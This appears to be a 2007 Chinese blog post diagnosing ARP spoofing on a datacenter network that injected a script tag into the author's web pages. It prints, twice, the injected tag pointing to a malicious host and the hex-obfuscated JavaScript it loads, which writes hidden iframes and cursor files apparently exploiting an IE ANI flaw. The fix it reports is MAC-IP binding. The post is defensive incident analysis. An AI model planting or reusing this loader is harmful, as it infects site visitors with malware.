網(wǎng)站被黑的假象--ARP欺騙之頁面中加入一段js
更新時間:2007年05月16日 00:00:00 作者:
昨天晚上發(fā)現(xiàn)訪問我的網(wǎng)站的時候網(wǎng)頁代碼html的前面多了一串js代碼。剛開始以為網(wǎng)站被黑了,趕緊到服務(wù)器上查看所有文件是否帶有這串js代碼,搜索結(jié)果沒有,而且服務(wù)器也沒發(fā)現(xiàn)被入侵的痕跡。
<script src=http://fuck.ns2go.com/dir/index_pic/1.js></script>
于是只能從這段代碼入手,我下載這個js開發(fā)發(fā)現(xiàn)是下面一段代碼:
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x31\x2e\x67\x69\x66\'\x29\"\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x32\x2e\x67\x69\x66\'\x29\"\x3e\x3c\/\x44\x49\x56\x3e\x3c\/\x44\x49\x56\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x30\x36\x30\x31\x34\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x31 \x68\x65\x69\x67\x68\x74\x3d\x31\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x74\x6a\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e")
在google上搜索發(fā)現(xiàn)有人已經(jīng)發(fā)現(xiàn)同樣情況.http://0e2.net/post/676.html
看了這篇文章之后了解到不是服務(wù)器被黑了,而是服務(wù)器所在的機(jī)房內(nèi)網(wǎng)有中木馬病毒的主機(jī)在搞arp欺騙.
這些木馬捕抓了我的服務(wù)器發(fā)送出來的報文之后,篡改了報文的內(nèi)容,在html頭加入了前面那段木馬病毒代碼.然后再轉(zhuǎn)發(fā)給訪問我網(wǎng)站的用戶主機(jī).這段木馬是針對ie的ani漏洞的,微軟用戶的電腦要趕緊升級打補(bǔ)丁.
最后問題就在于如何讓我的服務(wù)器防止被ARP欺騙.打電話到機(jī)房,技術(shù)人員讓我們將mac和ip地址綁定,問題終于解決.
關(guān)于ARP欺騙相關(guān)知識:
http://zhidao.baidu.com/question/7980952.html?si=1
<script src=http://fuck.ns2go.com/dir/index_pic/1.js></script>
于是只能從這段代碼入手,我下載這個js開發(fā)發(fā)現(xiàn)是下面一段代碼:
復(fù)制代碼 代碼如下:
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x31\x2e\x67\x69\x66\'\x29\"\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x32\x2e\x67\x69\x66\'\x29\"\x3e\x3c\/\x44\x49\x56\x3e\x3c\/\x44\x49\x56\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x30\x36\x30\x31\x34\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x31 \x68\x65\x69\x67\x68\x74\x3d\x31\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x74\x6a\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e")
在google上搜索發(fā)現(xiàn)有人已經(jīng)發(fā)現(xiàn)同樣情況.http://0e2.net/post/676.html
看了這篇文章之后了解到不是服務(wù)器被黑了,而是服務(wù)器所在的機(jī)房內(nèi)網(wǎng)有中木馬病毒的主機(jī)在搞arp欺騙.
這些木馬捕抓了我的服務(wù)器發(fā)送出來的報文之后,篡改了報文的內(nèi)容,在html頭加入了前面那段木馬病毒代碼.然后再轉(zhuǎn)發(fā)給訪問我網(wǎng)站的用戶主機(jī).這段木馬是針對ie的ani漏洞的,微軟用戶的電腦要趕緊升級打補(bǔ)丁.
最后問題就在于如何讓我的服務(wù)器防止被ARP欺騙.打電話到機(jī)房,技術(shù)人員讓我們將mac和ip地址綁定,問題終于解決.
關(guān)于ARP欺騙相關(guān)知識:
http://zhidao.baidu.com/question/7980952.html?si=1
相關(guān)文章
微信小程序?qū)崿F(xiàn)瀑布流布局與無限加載的方法詳解
瀑布流布局是我們?nèi)粘i_發(fā)中經(jīng)常見到的一種頁面布局方式,下面這篇文章主要給大家介紹了微信小程序?qū)崿F(xiàn)瀑布流布局與無限加載的相關(guān)資料,文中給出了詳細(xì)介紹和示例代碼供大家參考學(xué)習(xí),需要的朋友們下面來一起看看吧。2017-05-05jqgrid 表格數(shù)據(jù)導(dǎo)出實(shí)例
jqgrid并沒有自帶導(dǎo)出表格數(shù)據(jù)的方法,這里就自己實(shí)現(xiàn)了一個,嘗試過在頁面直接將數(shù)據(jù)導(dǎo)出,發(fā)現(xiàn)只有IE下可以通過調(diào)用saveas來實(shí)現(xiàn),但是別的瀏覽器不支持,于是考慮將數(shù)據(jù)傳回后臺,然后后臺返回下載文件來實(shí)現(xiàn)2013-11-11原生JS版和jquery版實(shí)現(xiàn)checkbox的全選/全不選/點(diǎn)選/行內(nèi)點(diǎn)選(Mr.Think)
腳本之家小編之前整理不少checkbox全選全不選這方便的文章,但看了這篇以后發(fā)現(xiàn)實(shí)現(xiàn)方法更好2016-10-10javascript 強(qiáng)制刷新頁面的實(shí)現(xiàn)代碼
javascript 強(qiáng)制刷新頁面的代碼,大家經(jīng)常能用的到。2009-12-12